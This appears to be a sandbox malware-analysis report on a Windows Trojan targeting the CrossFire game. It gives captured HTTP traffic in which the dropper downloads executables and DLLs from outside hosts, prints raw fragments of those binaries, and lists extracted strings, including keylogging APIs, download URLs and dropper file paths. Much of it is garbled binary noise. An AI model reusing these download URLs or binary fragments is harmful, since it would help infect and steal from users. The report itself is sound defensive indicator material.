cy4yizWj616ns9Un9zQHMsHzi/8Sex6vb6Lbsx9q897S7tsc6tyf8r2eet9qMq2ycusMsu3H8yIb/16SdvSLNvETML6v7zB38yySb5zyNxbPLLoebv3q8t1zLx1Osus47yrmb4yK61LjcvLrQDs0NyAP8xxGqw6n7q6yC0zGu10AjM2wiuU3r0in77KzCpGvd0ruM512qv9q8q6yy8Hrq0nGN9BPPtDT808yirHndygbrqSXu19P7vya wsoL19KN2QHqwOD9 VzStQr/uTXLtP3du2HLLDPd03WvyWrs74C9xkaM/wyyw6qL19KN2QH tSzLxEzytGrvsfDr7sXr0oeNL4GL6JT7zJjr03qay8SNLObNw3qfy2Td2PDdwweML6vb6Lbsx9qctjzyp3K/xoaLz5aNuNbLL1r89BvMy0SroOzdui6ML6v7zBXtyNv8r2S91sUvysad6zq8t1zLL u8q5Gusied RXP15vcoXD907OsCNwSzQvf1HHboCrfurqLLQPb4WHDMyYDL6SdvS3M07XNL0ir3QTqxbH9qL3ryrqLLnGN9BrfyG/rvxyS9KXu19PL58euzsccshKszQvf1djMwDzCuxiey0 c5HPas3uLLkaM/w6s15Hd9UzytGrvsEXL2QH tsAvwvWLt3G ufDr7sLeuKLLL4GL6JXL06vLtPnMusEqsyyb2PDdwweMw3SK1Or75Izi 7m yGbcvK3fwzrMLcnc69e6tyf8r2eetsg6t9e79BvMy02s3Ozi 72f1D37zB38ys0M0cvsy3WPvsaN/OzivLvauKft4NHusie9q2atxK0ALHHboCj6tknsoXzC0zGu1rXt95u2cuxyw6 cvIHruU3r0G/L0ELNvETMLdj8 VTqxbH9qLnb0sIP0MP7pRTfw6nroTzS5W3/skPr7Mve17KNLSzLqX7M07X9vya wsQbw43Muxiey0 c5HzCpz2fukaM/wacwObNtD
<<< skipped >>>
GET / HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Location: hXXp://publodf.kintip.com.cn/iisstart.htm
Last-Modified: Wed, 21 Dec 2016 05:14:24 GMT
ETag: "2c246518495bd21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b484d5935990-VIE
452..<html>.<head>.<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=gb2312">.<title ID=titletext>......</title>.</head>.<body bgcolor=white>.<table>.<tr>.<td ID=tableProps width=70 valign=top align=center>.<img ID=pagerrorImg src="pagerror.gif" width=36 height=48>.<td ID=tablePropsWidth width=400>.<h1 ID=errortype style="font:14pt/16pt ...., verdana; color:#4e4e4e">.<P ID=Comment1> <P ID="errorText">......7</h1>.<P ID=Comment2> <P ID="errordesc"><font style="font:9pt/12pt ....; color:black">..................................................................<P ID=term1>...............................................................<hr size=1 color="blue">.<P ID=message1>..
HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Set-Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681; expires=Mon, 19-Feb-18 03:41:21 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e146ed59ae-VIE
....
GET /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e5d77359ae-VIE
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PC.{.".(.".(.".({Th(.".(..](.".(..i(.".(..h(V".(.Z@(.".(.ZP(.".(.".(.#.(..l(.".(..Y(.".(..^(.".(Rich.".(................PE..L...oE]V.....................................0....@..................................W....@.................................@...,................................K...5..................................@............0.. ............................text............................... ..`.rdata.......0......................@..@.data...DO...0...*..................@....rsrc................4..............@..@.reloc...e.......f...2..............@..B........................................................................................................................................................................................................................................................................................................................................U..j.h..D.d.....P........0F.3..E.VWP.E.d.....3...(....}.3...iE...0.....D.........@.....0.........WWWWW.E.....4E...(...;.ul.{..C.......0...............D....r...0...P..y.......D.........@.........0.....E......E.....H........J........M.Wh....WWQP..|4E...;.u/.{..C.......0.........G.....D....r...0...R.v...W.. ...Q..$...Rh... V..$..... ..........4E...........$.......r&.{..C.......0.....................4...h......M...WQ..L..............,...Rh......L...PV..,......4E.9.,...tk....$......L....P...$......@..u. .P..L...
<<< skipped >>>
HEAD /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:29 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b413e45159ae-VIE
....
GET /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:30 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b41634a559ae-VIE
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.............N|......NH.)....NI.......a.......q.........}.............a......NM......Ny......Nx......N......Rich....................PE..L...on.X...........!.....$...........{.......@......................................9.....@.............................H............P.......................`..@0...D..................................@............@...............................text....".......$.................. ..`.rdata..X....@.......(..............@..@.data...DE....... ..................@....rsrc........P......................@..@.reloc...B...`...D..................@..B........................................................................................................................................................................................................................................................................................................................U..j.h.#..d.....PQV. ...3.P.E.d......u..E......E...........P..............E.....V.E......#.........M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.h.......@....3..G...............Q. J.....D?.Pj.V.Ht........H...@..u.WV .PSj.h.......@...}.Vh.t............t.V..M....._.....^]................U..QW....u._..].SVW..$A..j.j.j.j...SWj.h......@B...E.@P.}I.........u.^[_..]..E.j.j.PVSWj.h......@B....0....P..I...@..u..]. ...V.......V..L.......3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E......
<<< skipped >>>
HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:16 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
HTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sun, 19 Feb 2017 03:47:16 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connection: keep-alive..
GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:14 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=6940DB1C86E784EA6CBDE5BD19B3ED96.yqblog8-8010; Domain=.blog.163.com; Path=/
b49.. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <head>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.. <meta http-equiv="content-type" content="text/html;charset=gbk"/>.. <meta http-equiv="content-style-type" content="text/css"/>.. <meta http-equiv="content-script-type" content="text/javascript"/>.. <meta name="version" content="neblog-1.0"/>.. <script type="text/javascript">.. .. .. document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash); .. document.domain = location.hostname.replace(/^.*\.([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicTimeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};.. .. //BLOG-647:....OS.............................. (function(){.. window.setTimeout(function(){.. var _loginUserIcon = document.getElementById('loginUserIcon');.. var _rsavatarimg = document.getElementById('rsavatarimg');.. if(!!_loginUserIcon){.. var _loaded1 = false;.. var _img1 = new Image();.. _img1.onload = function(){.. _loaded1 = true;.. _img1.onload = null;.. };.. _img1.src = _loginUserIcon.src;.. window.setTimeout(function(){.. if(!_loaded1){..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_3308:
`.rsrc
`.rsrc
).pU
).pU
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
wininet.dll
wininet.dll
ole32.dll
ole32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
User32.dll
User32.dll
Kernel32.dll
Kernel32.dll
shell32.dll
shell32.dll
gdiplus.dll
gdiplus.dll
GdiPlus.dll
GdiPlus.dll
Ole32.dll
Ole32.dll
OleAut32.dll
OleAut32.dll
oleaut32.dll
oleaut32.dll
gzip.dll
gzip.dll
ntdll.dll
ntdll.dll
gdi32.dll
gdi32.dll
Gdi32.dll
Gdi32.dll
imm32.dll
imm32.dll
OLEACC.DLL
OLEACC.DLL
advapi32.dll
advapi32.dll
shlwapi.dll
shlwapi.dll
atl.dll
atl.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
ShellExecuteA
ShellExecuteA
GetProcessHeap
GetProcessHeap
GetAsyncKeyState
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
GetUrlCacheEntryInfoA
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
GdiplusShutdown
GdiplusShutdown
%d-d-d d:d:d
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
"sMsg":"
https
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
http=
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXps://
hXXp://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
1970-01-01 08:00:00
[VVV.111Ttt.com]
[VVV.111Ttt.com]
-URL:
-URL:
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
crossfire.exe
MsgBox
MsgBox
SysShadow.SubWnd
SysShadow.SubWnd
\exdui.dll
\exdui.dll
.rsrc
.rsrc
@V.Dv
@V.Dv
.UmKm
.UmKm
4v %u
4v %u
oft.XMLDOMnY
oft.XMLDOMnY
\dwmapi.dll
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
Leave.CoIn@alize
number is %d.
number is %d.
:"%s"
:"%s"
..0`%X
..0`%X
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ATL.DLL
ATL.DLL
GDI32.dll
GDI32.dll
MSVCRT.dll
MSVCRT.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
exdui.dll
exdui.dll
t=.VMV
t=.VMV
%%fnW
%%fnW
,7Z.in
,7Z.in
k`%u"]
k`%u"]
T.ZQ2
T.ZQ2
CDKEY
CDKEY
CDKEY:
CDKEY:
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
wW.Gg
wW.Gg
NA EE9KR?WC [I7WT
NA EE9KR?WC [I7WT
NA FE9KR?WC [I7WT
NA FE9KR?WC [I7WT
Z|.Gw
Z|.Gw
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
l.er;
l.er;
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
8`!%x
8`!%x
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.pQ\ a
.NaH-*
.NaH-*
!)!!))!)-*1-(333:73_
!)!!))!)-*1-(333:73_
%XE%Z
%XE%Z
dj%d~
dj%d~
.PXF3
.PXF3
02/24/16
02/24/16
%UD-Od
%UD-Od
lI*wt.KK
lI*wt.KK
%4u3\2t
%4u3\2t
W.ctn
W.ctn
.yEXjmS
.yEXjmS
Yn7%X
Yn7%X
..RZd
..RZd
A$#%DR
A$#%DR
Wx.xlu
Wx.xlu
n.mJ~f#
n.mJ~f#
Il%UVl_
Il%UVl_
.mDB`
.mDB`
.ijWU5
.ijWU5
w%SY
w%SY
Wkbn%X
Wkbn%X
kEYH
kEYH
&.kPd
&.kPd
(s.PKL
(s.PKL
>%fZM
>%fZM
T2%xE
T2%xE
dQ]%U
dQ]%U
#.mkTSx
#.mkTSx
.Ag.~
.Ag.~
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
V2.6.0
V2.6.0
\CF_data.ini
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
hXXp://VVV.cfzhushou.com
.text
.text
`.rdata
`.rdata
@.data
@.data
CF_Helper.dll
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
\CF_Helper.dll
@.reloc
@.reloc
%Program Files%\sesvcs_%d_56089.exe
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
\xxx\Helper.pdb
Helper.dll
Helper.dll
KERNEL32.dll
KERNEL32.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
true
true
7.84888
7.84888
6 696?6{6
6 696?6{6
14686
14686
5 5(50585
5 5(50585
? ?$?,?@?`?
? ?$?,?@?`?
>$>0>4>8>
>$>0>4>8>
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
WinExec
WinExec
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
